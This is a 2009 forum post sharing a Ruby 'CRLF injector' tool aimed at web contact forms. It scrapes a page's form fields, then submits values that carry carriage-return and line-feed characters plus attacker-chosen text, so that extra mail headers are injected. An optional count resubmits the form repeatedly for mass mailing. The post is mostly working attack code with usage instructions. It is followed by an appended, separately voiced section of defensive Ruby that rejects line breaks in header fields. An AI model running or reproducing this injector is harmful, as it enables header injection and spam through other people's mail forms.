Author Topic: Ruby CRLF Injector  (Read 629 times)

Offline SH4V

Ruby CRLF Injector
« : 29/10/2009, 10:24:38 pm »
Code:
#!/usr/bin/ruby
#CRLF injector
#http://N3t-Datagrams.net
#N-D labs #{Sh4v}
require 'rubygems'
require 'mechanize'
case ARGV[0]
when "-1"
ARGV.shift
url=ARGV[0]
puts "
Collecting form data..."
agent=WWW::Mechanize.new
url=agent.get(url)
form=url.forms
form.each { |z|
puts "Page: #{url.uri}
Action: #{z.action}
Method: #{z.method}
Form name: #{z.name}
Field(s) name(s): "
z.fields.each { |y|
puts " [-] Name: #{y.name}"
}
}
when "-2"
ARGV.shift
tim=ARGV[ARGV.size - 1].to_i
if tim==0
tim=1
else
ARGV.pop
end
url=ARGV[ARGV.size - 1]
ARGV.pop
agent=WWW::Mechanize.new
url=agent.get(url)
if ARGV[0]=="default"
form=url.forms.first
else
form=url.form(ARGV[0])
end
ARGV.shift
ARGV.each {|x|
if x[x.length - 6, x.length]=="[CRLF]" || x[x.length - 6, x.length]=="[crlf]"
x=x[0, x.length - 6]
puts "Valor para #{x}:"
val=STDIN.gets.chomp
puts "CRLF injection:"
inj=STDIN.gets.chomp
form[x]="#{val}\r\n#{inj}"
else
puts "Valor para #{x}:"
val=STDIN.gets.chomp
form[x]=val
end
}
num=0
puts "Enviando correo(s)..."
until num==tim
agent.submit(form)
num+=1
end
puts "Correo(s) enviado(s) ;-)"
when "-h", "--help"
puts "
Usage: RCRLF-injector has two modes of operation.

[-h] Display help.

[-1] The first mode is used to gather information about the form.
Example: #{$0} -1 http://example.com/mail_contact.php

[-2] The second mode is used for make the CRLF injection itself.
Example: #{$0} -2 name_of_form name subject mailfrom message http://example.com/mail_contact.php

[*] You can use \"default\" name for use the first form of the url.

[*] If want to make a CRLF injection, you must add \"[CRLF]\" at the end of the vulnerable input, like that:
Example: #{$0} -2 name_of_form name subject mailfrom[CRLF] message http://example.com/mail_contact.php

[*] Another function implemented in RCRLF-injector is the posibility of send a lot of mails. You can do that adding a number at the end of the arguments, like that:
Example: #{$0} -2 name_of_form name subject mailfrom[CRLF] message http://example.com/mail_contact.php 10"

else
puts "Type -h for help."
end
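The script above works only when a contact form copies fields such as `mailfrom` or `subject` into mail headers without rejecting line breaks. As an added example that is not part of the original post, this is the server-side check that closes that hole, including the Ruby pitfall where `^` and `$` anchor each line rather than the whole string. The field names come from the post's usage text; the function names and the mailer shape are assumptions made for illustration.

```ruby
# Added example, not code from the original post: input checks for a contact-form mailer.
# Field names (name, subject, mailfrom, message) come from the post's usage text;
# function names and the message layout are hypothetical.

HEADER_FIELDS = %w[name subject mailfrom].freeze
LINE_BREAK    = /[\r\n]/                 # a bare CR or LF is enough to start a new header
WEAK_ADDR     = /^[^@\s]+@[^@\s]+$/      # ^ and $ match per line in Ruby
STRICT_ADDR   = /\A[^@\s]+@[^@\s]+\z/    # \A and \z anchor the whole string

class HeaderInjectionError < StandardError; end

# Pitfall shown for contrast: line anchors accept a value whose first line
# alone looks like an address, even if more lines follow.
def weak_address?(value)
  !!(value =~ WEAK_ADDR)
end

# Reject any header-bound field that contains a line break, then require
# mailfrom to be exactly one address.
def validate_form!(params)
  HEADER_FIELDS.each do |field|
    value = params.fetch(field, '').to_s
    if value.match?(LINE_BREAK)
      raise HeaderInjectionError, "line break in header field #{field.inspect}"
    end
  end
  unless params['mailfrom'].to_s.match?(STRICT_ADDR)
    raise HeaderInjectionError, 'mailfrom is not a single address'
  end
  params
end

# Build the message only from validated fields. The body is the one place
# where newlines are legitimate, so it is never interpolated into a header.
def build_message(params, recipient)
  validate_form!(params)
  headers = [
    "From: #{params['mailfrom']}",
    "To: #{recipient}",
    "Subject: #{params['subject']}"
  ]
  headers.join("\r\n") + "\r\n\r\n" + params['message'].to_s
end
```

Run the check on the values as the application receives them (after the framework has URL-decoded the request), since that is the form in which they reach the mail library.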